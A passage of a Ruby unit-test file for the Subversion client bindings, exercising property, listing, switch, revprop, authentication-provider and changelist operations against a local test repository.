  assert_equal({uri => prop_value}, ctx.pget(prop_name, path))
  ctx.prop_del(prop_name, path)
  ctx.commit(@wc_path)
  assert_equal({}, ctx.pg(prop_name, path))
  ctx.ps(prop_name, prop_value, path)
  ctx.commit(@wc_path)
  assert_equal({uri => prop_value}, ctx.pg(prop_name, path))
  ctx.ps(prop_name, nil, path) # nil value deletes the property
  ctx.commit(@wc_path)
  assert_equal({}, ctx.pg(prop_name, path))
  ctx.up(@wc_path)
  ctx.ps(prop_name, prop_value, dir_path) # recursive set by default
  ctx.ci(@wc_path)
  assert_equal({
                 dir_uri => prop_value,
                 uri => prop_value,
               },
               ctx.pg(prop_name, dir_path))
  ctx.up(@wc_path)
  ctx.pdel(prop_name, dir_path, false) # non-recursive delete
  ctx.ci(@wc_path)
  assert_equal({uri => prop_value}, ctx.pg(prop_name, dir_path))
  ctx.up(@wc_path)
  ctx.pd(prop_name, dir_path) # recursive delete
  ctx.ci(@wc_path)
  assert_equal({}, ctx.pg(prop_name, dir_path))
  ctx.up(@wc_path)
  ctx.ps(prop_name, prop_value, dir_path, false) # non-recursive set
  ctx.ci(@wc_path)
  assert_equal({dir_uri => prop_value}, ctx.pg(prop_name, dir_path))
  assert_raises(Svn::Error::BadMimeType) do
    ctx.ps(Svn::Core::PROP_MIME_TYPE,
           invalid_mime_type_prop_value,
           path)
  end
  ctx.cleanup(@wc_path)
  assert_nothing_raised do
    # final true skips the mime-type validity check
    ctx.ps(Svn::Core::PROP_MIME_TYPE,
           invalid_mime_type_prop_value,
           path, false, true)
  end
  ctx.commit(@wc_path)
  assert_equal({uri => invalid_mime_type_prop_value},
               ctx.pg(Svn::Core::PROP_MIME_TYPE, path))
end
# Exercises prop_list and its aliases (plist/pl): the returned items expose
# node_name/name, prop_hash/props, and indexed lookup by property name;
# listing a directory yields one item per node that has properties.
def test_prop_list
  log = "sample log"
  dir = "dir"
  file = "sample.txt"
  dir_path = File.join(@wc_path, dir)
  path = File.join(dir_path, file)
  dir_uri = "#{@repos_uri}/#{dir}"
  uri = "#{dir_uri}/#{file}"
  name1 = "name1"
  name2 = "name2"
  value1 = "value1"
  value2 = "value2"
  ctx = make_context(log)
  ctx.mkdir(dir_path)
  File.open(path, "w") {}
  ctx.add(path)
  ctx.ci(@wc_path)
  # No properties anywhere yet.
  assert_equal([], ctx.prop_list(path))
  ctx.ps(name1, value1, path)
  ctx.ci(@wc_path)
  assert_equal([uri], ctx.prop_list(path).collect{|item| item.node_name})
  assert_equal([{name1 => value1}],
               ctx.plist(path).collect{|item| item.prop_hash})
  assert_equal([value1], ctx.pl(path).collect{|item| item[name1]})
  ctx.up(@wc_path)
  # Setting on the directory recurses, so the file ends up with both props.
  ctx.ps(name2, value2, dir_path)
  ctx.ci(@wc_path)
  assert_equal([uri, dir_uri].sort,
               ctx.prop_list(dir_path).collect{|item| item.name})
  prop_list = ctx.plist(dir_path).collect{|item| [item.name, item.props]}
  props = prop_list.assoc(uri)[1]
  dir_props = prop_list.assoc(dir_uri)[1]
  assert_equal({name1 => value1, name2 => value2}, props)
  assert_equal({name2 => value2}, dir_props)
end
# Every recurse/depth argument accepted by the client API: the two legacy
# recurse booleans followed by the svn_depth_t string names.
def recurse_and_depth_choices
  [false, true] + %w[empty files immediates infinity]
end
# Runs prop_get/prop_set/prop_list against a single file (:mu in the greek
# tree) for every recurse/depth choice; on a file the depth argument should
# not change the outcome.  One property is set per depth value, named after it.
def test_file_prop
  setup_greek_tree
  log = "sample log"
  ctx = make_context(log)
  # when no props set, everything is empty
  recurse_and_depth_choices.each do |rd|
    assert_equal([],
                 ctx.prop_list(@greek.path(:mu), nil, nil, rd),
                 "prop_list with Depth '#{rd}'")
  end
  recurse_and_depth_choices.each do |rd|
    assert_equal({},
                 ctx.prop_get(rd.to_s, @greek.path(:mu), nil, nil, rd),
                 "prop_get with Depth '#{rd}'")
  end
  # set some props
  recurse_and_depth_choices.each do |rd|
    ctx.prop_set(rd.to_s, rd.to_s, @greek.path(:mu), rd)
  end
  ctx.commit(@greek.path(:mu))
  # get the props
  recurse_and_depth_choices.each do |rd|
    assert_equal({@greek.uri(:mu) => rd.to_s},
                 ctx.prop_get(rd.to_s, @greek.path(:mu), nil, nil, rd),
                 "prop_get with Depth '#{rd}'")
  end
  prop_hash = {}
  recurse_and_depth_choices.each {|rd| prop_hash[rd.to_s] = rd.to_s}
  # list the props
  recurse_and_depth_choices.each do |rd|
    props = ctx.prop_list(@greek.path(:mu), nil, nil, rd)
    assert_equal([@greek.uri(:mu)],
                 props.collect {|item| item.node_name},
                 "prop_list (node_name) with Depth '#{rd}'")
    props = ctx.plist(@greek.path(:mu), nil, nil, rd)
    assert_equal([prop_hash],
                 props.collect {|item| item.prop_hash},
                 "prop_list (prop_hash) with Depth '#{rd}'")
    # Each property set above must be retrievable regardless of list depth.
    recurse_and_depth_choices.each do |rd1|
      props = ctx.plist(@greek.path(:mu), nil, nil, rd)
      assert_equal([rd1.to_s],
                   props.collect {|item| item[rd1.to_s]},
                   "prop_list (#{rd1.to_s}]) with Depth '#{rd}'")
    end
  end
end
# Runs property operations against a directory subtree (:b in the greek tree)
# for every recurse/depth choice, then checks exactly which nodes each depth
# reached: true/'infinity' cover the whole subtree, false/'empty' only the
# directory, 'files' direct file children, 'immediates' direct children.
def test_dir_prop
  setup_greek_tree
  log = "sample log"
  ctx = make_context(log)
  # when no props set, everything is empty
  recurse_and_depth_choices.each do |rd|
    assert_equal([],
                 ctx.prop_list(@greek.path(:b), nil, nil, rd),
                 "prop_list with Depth '#{rd}'")
  end
  recurse_and_depth_choices.each do |rd|
    assert_equal({},
                 ctx.prop_get(rd.to_s, @greek.path(:b), nil, nil, rd),
                 "prop_get with Depth '#{rd}'")
  end
  # set some props with various depths
  recurse_and_depth_choices.each do |rd|
    ctx.prop_set(rd.to_s, rd.to_s, @greek.path(:b), rd)
  end
  ctx.commit(@greek.path(:b))
  # Which greek-tree nodes each depth value should have touched.
  expected_props = {
    true => [:beta, :b, :lambda, :e, :f, :alpha],
    false => [:b],
    'empty' => [:b],
    'files' => [:b, :lambda],
    'immediates' => [:b, :lambda, :e, :f],
    'infinity' => [:beta, :b, :lambda, :e, :f, :alpha],
  }
  paths = [:b, :e, :alpha, :beta, :f, :lambda]
  # how are the props set?
  recurse_and_depth_choices.each do |rd|
    paths.each do |path|
      if expected_props[rd].include?(path)
        expected = {@greek.uri(path) => rd.to_s}
      else
        expected = {}
      end
      assert_equal(expected,
                   ctx.prop_get(rd.to_s, @greek.path(path), nil, nil, false),
                   "prop_get #{@greek.resolve(path)} with Depth '#{rd}'")
    end
  end
  # Cross-check every (property depth, query depth) combination: the result
  # is the intersection of the nodes each depth reaches.
  recurse_and_depth_choices.each do |rd_for_prop|
    recurse_and_depth_choices.each do |rd_for_depth|
      expected = {}
      expected_paths = expected_props[rd_for_depth]
      expected_paths &= expected_props[rd_for_prop]
      expected_paths.each do |path|
        expected[@greek.uri(path)] = rd_for_prop.to_s
      end
      assert_equal(expected,
                   ctx.prop_get(rd_for_prop.to_s, @greek.path(:b),
                                nil, nil, rd_for_depth),
                   "prop_get '#{rd_for_prop}' with Depth '#{rd_for_depth}'")
    end
  end
  recurse_and_depth_choices.each do |rd|
    props = ctx.prop_list(@greek.path(:b), nil, nil, rd)
    assert_equal(expected_props[rd].collect {|path| @greek.uri(path)}.sort,
                 props.collect {|item| item.node_name}.sort,
                 "prop_list (node_name) with Depth '#{rd}'")
  end
end
# Verifies Context#cat returns a file's content at an explicit revision and,
# with no revision argument, the latest content.
def test_cat
  log = "sample log"
  src1 = "source1\n"
  src2 = "source2\n"
  file = "sample.txt"
  path = File.join(@wc_path, file)
  File.open(path, "w") {|f| f.print(src1)}
  ctx = make_context(log)
  ctx.add(path)
  commit_info = ctx.commit(@wc_path)
  rev1 = commit_info.revision
  assert_equal(normalize_line_break(src1), ctx.cat(path, rev1))
  assert_equal(normalize_line_break(src1), ctx.cat(path))
  # Second commit: rev1 content must still be retrievable.
  File.open(path, "w") {|f| f.print(src2)}
  commit_info = ctx.commit(@wc_path)
  rev2 = commit_info.revision
  assert_equal(normalize_line_break(src1), ctx.cat(path, rev1))
  assert_equal(normalize_line_break(src2), ctx.cat(path, rev2))
  assert_equal(normalize_line_break(src2), ctx.cat(path))
end
# Locking a committed file must fire one notification, for the file's
# basename, whose notify object reports locked?.
def test_lock
  log = "sample log"
  src = "source\n"
  file = "sample.txt"
  path = File.join(@wc_path, file)
  File.open(path, "w") {|f| f.print(src)}
  ctx = make_context(log)
  ctx.add(path)
  ctx.commit(@wc_path)
  infos = []
  ctx.set_notify_func do |notify|
    infos << [notify.path, notify]
  end
  ctx.lock(path)
  # NOTE: the block parameter deliberately shadows the outer `path` local.
  assert_equal([file], infos.collect{|path, notify| path})
  file_notify = infos.assoc(file)[1]
  assert(file_notify.locked?)
end
# Mirror of test_lock: unlocking fires one notification whose notify object
# reports unlocked?.  The notify callback is installed after lock() so only
# the unlock event is recorded.
def test_unlock
  log = "sample log"
  src = "source\n"
  file = "sample.txt"
  path = File.join(@wc_path, file)
  File.open(path, "w") {|f| f.print(src)}
  ctx = make_context(log)
  ctx.add(path)
  ctx.commit(@wc_path)
  ctx.lock(path)
  infos = []
  ctx.set_notify_func do |notify|
    infos << [notify.path, notify]
  end
  ctx.unlock(path)
  assert_equal([file], infos.collect{|path, notify| path})
  file_notify = infos.assoc(file)[1]
  assert(file_notify.unlocked?)
end
# Context#info on the working-copy root yields one entry keyed by the
# repository basename, whose info.url is the repository URI.
def test_info
  log = "sample log"
  ctx = make_context(log)
  repos_base = File.basename(@repos_path)
  infos = []
  ctx.info(@wc_path) do |path, info|
    infos << [path, info]
  end
  assert_equal([repos_base],
               infos.collect{|path, info| path})
  top_info = infos.assoc(repos_base)[1]
  assert_equal(@repos_uri, top_info.url)
end
# Context#info with each recurse/depth choice: on a file the depth makes no
# difference; on a directory the set of reported URLs varies by depth exactly
# as for property operations (see test_dir_prop).
def test_info_with_depth
  setup_greek_tree
  log = "sample log"
  ctx = make_context(log)
  recurse_and_depth_choices.each do |rd|
    ctx.info(@greek.path(:mu),nil,nil,rd) do |path, info|
      assert_equal @greek.uri(:mu), info.URL
    end
  end
  expected_info_by_depth = {
    true => [:beta, :b, :lambda, :e, :f, :alpha],
    false => [:b],
    'empty' => [:b],
    'files' => [:b, :lambda],
    'immediates' => [:b, :lambda, :e, :f],
    'infinity' => [:beta, :b, :lambda, :e, :f, :alpha],
  }
  recurse_and_depth_choices.each do |rd|
    urls = []
    ctx.info(@greek.path(:b),nil,nil,rd) do |path, info|
      urls << info.URL
    end
    assert_equal expected_info_by_depth[rd].map{|s| @greek.uri(s)}.sort,
                 urls.sort,
                 "depth '#{rd}"
  end
end
# url_from_path maps a working-copy path back to its repository URL, both as
# an instance method and as a module function on Svn::Client.
def test_url_from_path
  log = "sample log"
  ctx = make_context(log)
  assert_equal(@repos_uri, ctx.url_from_path(@wc_path))
  assert_equal(@repos_uri, Svn::Client.url_from_path(@wc_path))
end
# The repository UUID obtained from the URL must match the one obtained from
# a working-copy path (the latter requires an open AdmAccess handle).
def test_uuid
  log = "sample log"
  ctx = make_context(log)
  Svn::Wc::AdmAccess.open(nil, @wc_path, false, 0) do |adm|
    assert_equal(ctx.uuid_from_url(@repos_uri),
                 ctx.uuid_from_path(@wc_path, adm))
  end
end
# open_ra_session on a repository URI returns an Svn::Ra::Session.
def test_open_ra_session
  log = "sample log"
  ctx = make_context(log)
  assert_instance_of(Svn::Ra::Session, ctx.open_ra_session(@repos_uri))
end
# Exercises the unversioned revision-property API and all of its aliases:
# revprop_list/rplist/rpl, revprop_get/rpget/rpg, revprop (value-only)/rp,
# revprop_set/rpset/rps, revprop_del.  Getters return [value, revision]
# pairs; list returns [props_hash, revision]; set/del return the revision.
def test_revprop
  log = "sample log"
  new_log = "new sample log"
  src = "source\n"
  file = "sample.txt"
  path = File.join(@wc_path, file)
  File.open(path, "w") {|f| f.print(src)}
  ctx = make_context(log)
  ctx.add(path)
  info = ctx.commit(@wc_path)
  # A fresh commit carries author, date and log revprops.
  assert_equal([
                 {
                   Svn::Core::PROP_REVISION_AUTHOR => @author,
                   Svn::Core::PROP_REVISION_DATE => info.date,
                   Svn::Core::PROP_REVISION_LOG => log,
                 },
                 info.revision
               ],
               ctx.revprop_list(@repos_uri, info.revision))
  assert_equal([log, info.revision],
               ctx.revprop_get(Svn::Core::PROP_REVISION_LOG,
                               @repos_uri, info.revision))
  assert_equal(log,
               ctx.revprop(Svn::Core::PROP_REVISION_LOG,
                           @repos_uri, info.revision))
  # Overwrite the log message.
  assert_equal(info.revision,
               ctx.revprop_set(Svn::Core::PROP_REVISION_LOG, new_log,
                               @repos_uri, info.revision))
  assert_equal([new_log, info.revision],
               ctx.rpget(Svn::Core::PROP_REVISION_LOG,
                         @repos_uri, info.revision))
  assert_equal(new_log,
               ctx.rp(Svn::Core::PROP_REVISION_LOG,
                      @repos_uri, info.revision))
  assert_equal([
                 {
                   Svn::Core::PROP_REVISION_AUTHOR => @author,
                   Svn::Core::PROP_REVISION_DATE => info.date,
                   Svn::Core::PROP_REVISION_LOG => new_log,
                 },
                 info.revision
               ],
               ctx.rplist(@repos_uri, info.revision))
  # Delete the log revprop; getters then return nil.
  assert_equal(info.revision,
               ctx.revprop_del(Svn::Core::PROP_REVISION_LOG,
                               @repos_uri, info.revision))
  assert_equal([nil, info.revision],
               ctx.rpg(Svn::Core::PROP_REVISION_LOG,
                       @repos_uri, info.revision))
  assert_equal(nil,
               ctx.rp(Svn::Core::PROP_REVISION_LOG,
                      @repos_uri, info.revision))
  # Set then delete again via the aliases; setting nil acts as a delete.
  assert_equal(info.revision,
               ctx.rpset(Svn::Core::PROP_REVISION_LOG, new_log,
                         @repos_uri, info.revision))
  assert_equal(new_log,
               ctx.rp(Svn::Core::PROP_REVISION_LOG,
                      @repos_uri, info.revision))
  assert_equal(info.revision,
               ctx.rps(Svn::Core::PROP_REVISION_LOG, nil,
                       @repos_uri, info.revision))
  assert_equal(nil,
               ctx.rp(Svn::Core::PROP_REVISION_LOG,
                      @repos_uri, info.revision))
  assert_equal([
                 {
                   Svn::Core::PROP_REVISION_AUTHOR => @author,
                   Svn::Core::PROP_REVISION_DATE => info.date,
                 },
                 info.revision
               ],
               ctx.rpl(@repos_uri, info.revision))
end
# Exporting the repository into a temporary directory returns the exported
# revision and reproduces the committed file content on disk.
def test_export
  log = "sample log"
  src = "source\n"
  file = "sample.txt"
  dir = "sample"
  dir_path = File.join(@wc_path, dir)
  path = File.join(dir_path, file)
  tmp_base_path = File.join(@tmp_path, "tmp")
  tmp_dir_path = File.join(tmp_base_path, dir)
  tmp_path = File.join(tmp_dir_path, file)
  ctx = make_context(log)
  ctx.mkdir(dir_path)
  File.open(path, "w") {|f| f.print(src)}
  ctx.add(path)
  rev = ctx.ci(@wc_path).revision
  assert_equal(rev, ctx.export(@repos_uri, tmp_base_path))
  assert_equal(src, File.open(tmp_path) {|f| f.read})
end
# Context#ls returns [dirents, locks]; the dirents hash is keyed by entry
# name and each dirent knows whether it is a file or a directory.
def test_ls
  log = "sample log"
  src = "source\n"
  file = "sample.txt"
  dir = "sample"
  dir_path = File.join(@wc_path, dir)
  path = File.join(@wc_path, file)
  ctx = make_context(log)
  ctx.mkdir(dir_path)
  File.open(path, "w") {|f| f.print(src)}
  ctx.add(path)
  rev = ctx.ci(@wc_path).revision
  dirents, locks = ctx.ls(@wc_path, rev)
  assert_equal([dir, file].sort, dirents.keys.sort)
  dir_dirent = dirents[dir]
  assert(dir_dirent.directory?)
  file_dirent = dirents[file]
  assert(file_dirent.file?)
end
# Context#list yields (path, dirent, lock, abs_path) per entry, including an
# empty-string entry for the listed root itself; dirent.have_props? reflects
# whether properties were committed on that node.
def test_list
  log = "sample log"
  src = "source\n"
  file = "sample.txt"
  dir = "sample"
  prop_name = "sample-prop"
  prop_value = "sample value"
  dir_path = File.join(@wc_path, dir)
  path = File.join(@wc_path, file)
  ctx = make_context(log)
  ctx.mkdir(dir_path)
  File.open(path, "w") {|f| f.print(src)}
  ctx.add(path)
  ctx.prop_set(prop_name, prop_value, path)
  rev = ctx.ci(@wc_path).revision
  entries = []
  ctx.list(@wc_path, rev) do |path, dirent, lock, abs_path|
    entries << [path, dirent, lock, abs_path]
  end
  paths = entries.collect do |path, dirent, lock, abs_path|
    [path, abs_path]
  end
  # "" is the root entry; abs_path is "/" for direct children of the root.
  assert_equal([["", "/"], [dir, "/"], [file, "/"]].sort, paths.sort)
  entries.each do |path, dirent, lock, abs_path|
    case path
    when dir, ""
      assert(dirent.directory?)
      assert_false(dirent.have_props?)
    when file
      assert(dirent.file?)
      assert_true(dirent.have_props?)
    else
      flunk
    end
  end
end
# Context#list with each recurse/depth choice on the :b subtree; note that,
# unlike property operations, recurse=false here behaves like 'immediates'
# (directory listing), not like 'empty'.
def test_list_with_depth
  setup_greek_tree
  log = "sample log"
  ctx = make_context(log)
  expected_lists_by_depth = {
    true => [:beta, :b, :lambda, :e, :f, :alpha],
    false => [:b, :lambda, :e, :f],
    'empty' => [:b],
    'files' => [:b, :lambda],
    'immediates' => [:b, :lambda, :e, :f],
    'infinity' => [:beta, :b, :lambda, :e, :f, :alpha],
  }
  recurse_and_depth_choices.each do |rd|
    paths = []
    ctx.list(@greek.path(:b), 'head' ,nil, rd) do |path, dirent, lock, abs_path|
      # The root entry arrives with an empty relative path.
      paths << (path.empty? ? abs_path : File.join(abs_path, path))
    end
    assert_equal(expected_lists_by_depth[rd].map{|s| "/#{@greek.resolve(s)}"}.sort,
                 paths.sort,
                 "depth '#{rd}")
  end
end
# Creates a trunk and a tag, then switches the working copy between their
# URLs: with no revision argument the switch lands on HEAD (youngest_rev);
# with an explicit revision it returns that revision and fires the expected
# update notifications (file update, dir update, completed).
#
# Fix: the original assigned `file = "sample.txt"` twice in a row; the
# duplicate assignment has been removed (no behavior change).
def test_switch
  log = "sample log"
  trunk_src = "trunk source\n"
  tag_src = "tag source\n"
  file = "sample.txt"
  trunk_dir = "trunk"
  tag_dir = "tags"
  tag_name = "0.0.1"
  trunk_repos_uri = "#{@repos_uri}/#{trunk_dir}"
  tag_repos_uri = "#{@repos_uri}/#{tag_dir}/#{tag_name}"
  trunk_dir_path = File.join(@wc_path, trunk_dir)
  tag_dir_path = File.join(@wc_path, tag_dir)
  tag_name_dir_path = File.join(@wc_path, tag_dir, tag_name)
  trunk_path = File.join(trunk_dir_path, file)
  tag_path = File.join(tag_name_dir_path, file)
  path = File.join(@wc_path, file)
  ctx = make_context(log)
  ctx.mkdir(trunk_dir_path)
  File.open(trunk_path, "w") {|f| f.print(trunk_src)}
  ctx.add(trunk_path)
  trunk_rev = ctx.commit(@wc_path).revision
  ctx.mkdir(tag_dir_path, tag_name_dir_path)
  File.open(tag_path, "w") {|f| f.print(tag_src)}
  ctx.add(tag_path)
  tag_rev = ctx.commit(@wc_path).revision
  # Switch to HEAD of each URL.
  assert_equal(youngest_rev, ctx.switch(@wc_path, trunk_repos_uri))
  assert_equal(normalize_line_break(trunk_src), ctx.cat(path))
  assert_equal(youngest_rev, ctx.switch(@wc_path, tag_repos_uri))
  assert_equal(normalize_line_break(tag_src), ctx.cat(path))
  notify_info = []
  ctx.set_notify_func do |notify|
    notify_info << [notify.path, notify.action]
  end
  # Switch to explicit revisions and check the notification sequence.
  assert_equal(trunk_rev, ctx.switch(@wc_path, trunk_repos_uri, trunk_rev))
  assert_equal(normalize_line_break(trunk_src), ctx.cat(path))
  assert_equal([
                 [path, Svn::Wc::NOTIFY_UPDATE_UPDATE],
                 [@wc_path, Svn::Wc::NOTIFY_UPDATE_UPDATE],
                 [@wc_path, Svn::Wc::NOTIFY_UPDATE_COMPLETED],
               ],
               notify_info)
  notify_info.clear
  assert_equal(tag_rev, ctx.switch(@wc_path, tag_repos_uri, tag_rev))
  assert_equal(normalize_line_break(tag_src), ctx.cat(path))
  assert_equal([
                 [path, Svn::Wc::NOTIFY_UPDATE_UPDATE],
                 [@wc_path, Svn::Wc::NOTIFY_UPDATE_UPDATE],
                 [@wc_path, Svn::Wc::NOTIFY_UPDATE_COMPLETED],
               ],
               notify_info)
end
# Authentication against svnserve: no provider raises AuthnNoProvider; a
# wrong username or wrong password raises RaNotAuthorized; correct
# credentials succeed.  Each add_simple_prompt_provider call installs the
# next credentials to try.
def test_authentication
  log = "sample log"
  src = "source\n"
  file = "sample.txt"
  path = File.join(@wc_path, file)
  svnserve_uri = "#{@repos_svnserve_uri}/#{file}"
  File.open(path, "w") {|f| f.print(src)}
  ctx = make_context(log)
  ctx.add(path)
  ctx.commit(@wc_path)
  # Fresh context: no auth providers registered at all.
  ctx = Svn::Client::Context.new
  assert_raises(Svn::Error::AuthnNoProvider) do
    ctx.cat(svnserve_uri)
  end
  ctx.add_simple_prompt_provider(0) do |cred, realm, username, may_save|
    cred.username = "wrong-#{@author}"
    cred.password = @password
    cred.may_save = false
  end
  assert_raises(Svn::Error::RaNotAuthorized) do
    ctx.cat(svnserve_uri)
  end
  ctx.add_simple_prompt_provider(0) do |cred, realm, username, may_save|
    cred.username = @author
    cred.password = "wrong-#{@password}"
    cred.may_save = false
  end
  assert_raises(Svn::Error::RaNotAuthorized) do
    ctx.cat(svnserve_uri)
  end
  ctx.add_simple_prompt_provider(0) do |cred, realm, username, may_save|
    cred.username = @author
    cred.password = @password
    cred.may_save = false
  end
  assert_equal(normalize_line_break(src), ctx.cat(svnserve_uri))
end
# Shared body for the simple-credential-cache provider tests: with only the
# cache provider (`method`) installed access is refused, and succeeds once a
# prompt provider supplies the real credentials (which the cache can store).
def assert_simple_provider(method)
  log = "sample log"
  src = "source\n"
  file = "sample.txt"
  path = File.join(@wc_path, file)
  svnserve_uri = "#{@repos_svnserve_uri}/#{file}"
  File.open(path, "w") {|f| f.print(src)}
  ctx = make_context(log)
  setup_auth_baton(ctx.auth_baton)
  ctx.add(path)
  ctx.commit(@wc_path)
  ctx = Svn::Client::Context.new
  setup_auth_baton(ctx.auth_baton)
  ctx.send(method)
  assert_raises(Svn::Error::RaNotAuthorized) do
    ctx.cat(svnserve_uri)
  end
  ctx = Svn::Client::Context.new
  setup_auth_baton(ctx.auth_baton)
  ctx.send(method)
  ctx.add_simple_prompt_provider(0) do |cred, realm, username, may_save|
    cred.username = @author
    cred.password = @password
  end
  assert_equal(normalize_line_break(src), ctx.cat(svnserve_uri))
end
# The plain on-disk simple credential cache provider.
def test_simple_provider
  assert_simple_provider(:add_simple_provider)
end
# Windows-only credential cache; defined only when the binding exposes it.
if Svn::Core.respond_to?(:auth_get_windows_simple_provider)
  def test_windows_simple_provider
    assert_simple_provider(:add_windows_simple_provider)
  end
end
# macOS Keychain credential cache; defined only when the binding exposes it.
if Svn::Core.respond_to?(:auth_get_keychain_simple_provider)
  def test_keychain_simple_provider
    assert_simple_provider(:add_keychain_simple_provider)
  end
end
# Username-only authentication via revprop_set: the repository hook accepts
# @author and rejects anything else (REPOS_HOOK_FAILURE).  Covers both the
# AUTH_PARAM_DEFAULT_USERNAME parameter and the username prompt provider,
# including a prompt block that supplies no username at all.
def test_username_provider
  log = "sample log"
  new_log = "sample new log"
  src = "source\n"
  file = "sample.txt"
  path = File.join(@wc_path, file)
  repos_uri = "#{@repos_uri}/#{file}"
  File.open(path, "w") {|f| f.print(src)}
  ctx = make_context(log)
  ctx.add(path)
  info = ctx.commit(@wc_path)
  # Default username parameter with the correct author succeeds.
  ctx = Svn::Client::Context.new
  setup_auth_baton(ctx.auth_baton)
  ctx.auth_baton[Svn::Core::AUTH_PARAM_DEFAULT_USERNAME] = @author
  ctx.add_username_provider
  assert_nothing_raised do
    ctx.revprop_set(Svn::Core::PROP_REVISION_LOG, new_log,
                    repos_uri, info.revision)
  end
  # Wrong username is rejected by the pre-revprop-change hook.
  ctx = Svn::Client::Context.new
  setup_auth_baton(ctx.auth_baton)
  ctx.auth_baton[Svn::Core::AUTH_PARAM_DEFAULT_USERNAME] = "#{@author}-NG"
  ctx.add_username_provider
  assert_raise(Svn::Error::REPOS_HOOK_FAILURE) do
    ctx.revprop_set(Svn::Core::PROP_REVISION_LOG, new_log,
                    repos_uri, info.revision)
  end
  # Prompt provider that sets nothing also fails.
  ctx = Svn::Client::Context.new
  setup_auth_baton(ctx.auth_baton)
  ctx.auth_baton[Svn::Core::AUTH_PARAM_DEFAULT_USERNAME] = nil
  ctx.add_username_prompt_provider(0) do |cred, realm, may_save|
  end
  assert_raise(Svn::Error::REPOS_HOOK_FAILURE) do
    ctx.revprop_set(Svn::Core::PROP_REVISION_LOG, new_log,
                    repos_uri, info.revision)
  end
  # Prompt provider supplying the right username succeeds.
  ctx = Svn::Client::Context.new
  setup_auth_baton(ctx.auth_baton)
  ctx.auth_baton[Svn::Core::AUTH_PARAM_DEFAULT_USERNAME] = nil
  ctx.add_username_prompt_provider(0) do |cred, realm, may_save|
    cred.username = @author
  end
  assert_nothing_raised do
    ctx.revprop_set(Svn::Core::PROP_REVISION_LOG, new_log,
                    repos_uri, info.revision)
  end
end
# Smoke test: registering the SSL auth providers must not raise; the
# Windows trust provider is attempted only where the binding exposes it.
def test_add_providers
  ctx = Svn::Client::Context.new
  assert_nothing_raised do
    ctx.add_ssl_client_cert_file_provider
    ctx.add_ssl_client_cert_pw_file_provider
    ctx.add_ssl_server_trust_file_provider
    if Svn::Core.respond_to?(:auth_get_windows_ssl_server_trust_provider)
      ctx.add_windows_ssl_server_trust_provider
    end
  end
end
# The deprecated CommitItem/CommitItem2 classes must not be constructible;
# CommitItem3 is, and survives dup with its attributes intact.
def test_commit_item
  assert_raise(NoMethodError) do
    Svn::Client::CommitItem.new
  end
  assert_raise(NoMethodError) do
    Svn::Client::CommitItem2.new
  end
  item = Svn::Client::CommitItem3.new
  assert_kind_of(Svn::Client::CommitItem3, item)
  url = "xxx"
  item.url = url
  assert_equal(url, item.dup.url)
end
# Checks the commit items handed to the log-message callback for a normal
# commit vs a wc-to-repos copy.
#
# NOTE(review): the outer `items = nil` is later read back after the commit,
# which only works if the block parameter |items| shares the enclosing local
# — pre-1.9 block-argument semantics.  Under Ruby 1.9+ block params are
# block-local, so the outer `items` would stay nil; this code presumably
# targets Ruby 1.8 — confirm before porting.
def test_log_msg_func_commit_items
  log = "sample log"
  file = "file"
  file2 = "file2"
  src = "source"
  path = File.join(@wc_path, file)
  repos_uri2 = "#{@repos_uri}/#{file2}"
  File.open(path, "w") {|f| f.print(src)}
  ctx = make_context(log)
  items = nil
  ctx.set_log_msg_func do |items|
    [true, log]
  end
  ctx.add(path)
  ctx.prop_set(Svn::Core::PROP_MIME_TYPE, "text/plain", path)
  ctx.commit(@wc_path)
  assert_equal([[]], items.collect {|item| item.wcprop_changes})
  assert_equal([[]], items.collect {|item| item.incoming_prop_changes})
  assert_equal([nil], items.collect {|item| item.outgoing_prop_changes})
  items = nil
  ctx.cp(path, repos_uri2)
  assert_equal([nil], items.collect {|item| item.wcprop_changes})
  assert_equal([nil], items.collect {|item| item.incoming_prop_changes})
  assert_equal([nil], items.collect {|item| item.outgoing_prop_changes})
end
# Raising Svn::Error::Cancelled from the log-message callback aborts the
# commit and propagates the exception to the caller.
def test_log_msg_func_cancel
  log = "sample log"
  dir = "dir"
  dir_path = File.join(@wc_path, dir)
  ctx = make_context(log)
  ctx.set_log_msg_func do |items|
    raise Svn::Error::Cancelled
  end
  ctx.mkdir(dir_path)
  assert_raise(Svn::Error::Cancelled) do
    ctx.commit(@wc_path)
  end
end
# Writes an ini-style "servers" config file, loads it via Svn::Core::Config,
# and assigns it to the context; the context starts with no config and then
# reflects the loaded sections/values.
def test_set_config
  log = "sample log"
  ctx = make_context(log)
  options = {
    "groups" => {"collabnet" => "svn.collab.net"},
    "collabnet" => {
      "http-proxy-host" => "proxy",
      "http-proxy-port" => "8080",
    },
  }
  servers_config_file = File.join(@config_path,
                                  Svn::Core::CONFIG_CATEGORY_SERVERS)
  # Render the options hash in ini format ([section] / key = value lines).
  File.open(servers_config_file, "w") do |file|
    options.each do |section, values|
      file.puts("[#{section}]")
      values.each do |key, value|
        file.puts("#{key} = #{value}")
      end
    end
  end
  config = Svn::Core::Config.config(@config_path)
  assert_nil(ctx.config)
  assert_equal(options, config[Svn::Core::CONFIG_CATEGORY_SERVERS].to_hash)
  ctx.config = config
  assert_equal(options,
               ctx.config[Svn::Core::CONFIG_CATEGORY_SERVERS].to_hash)
end
# A fresh context has no MIME-type map; an assigned extension-to-type hash
# is stored and read back unchanged.
def test_context_mimetypes_map
  ctx = Svn::Client::Context.new
  assert_nil(ctx.mimetypes_map)
  mapping = {"txt" => "text/plain"}
  ctx.mimetypes_map = mapping
  assert_equal(mapping, ctx.mimetypes_map)
end
# Shared driver for the changelist tests.  The caller's block queries
# changelists for a given name argument and returns {changelist => [paths]};
# this method builds two files and checks add_to_changelist /
# remove_from_changelists against every query form: a single name, nil
# (everything, including unassigned paths under the nil key), an empty
# array (nothing), and arrays of names.
def assert_changelists
  log = "sample log"
  file1 = "hello1.txt"
  file2 = "hello2.txt"
  src = "Hello"
  changelist1 = "XXX"
  changelist2 = "YYY"
  path1 = File.join(@wc_path, file1)
  path2 = File.join(@wc_path, file2)
  ctx = make_context(log)
  File.open(path1, "w") {|f| f.print(src)}
  File.open(path2, "w") {|f| f.print(src)}
  ctx.add(path1)
  ctx.add(path2)
  ctx.commit(@wc_path)
  # No assignments yet: only the nil query sees anything.
  assert_equal({}, yield(ctx, changelist1))
  assert_equal({nil=>[@wc_path,path1,path2]}, yield(ctx, nil))
  assert_equal({}, yield(ctx, []))
  assert_equal({}, yield(ctx, [changelist1]))
  assert_equal({}, yield(ctx, [changelist2]))
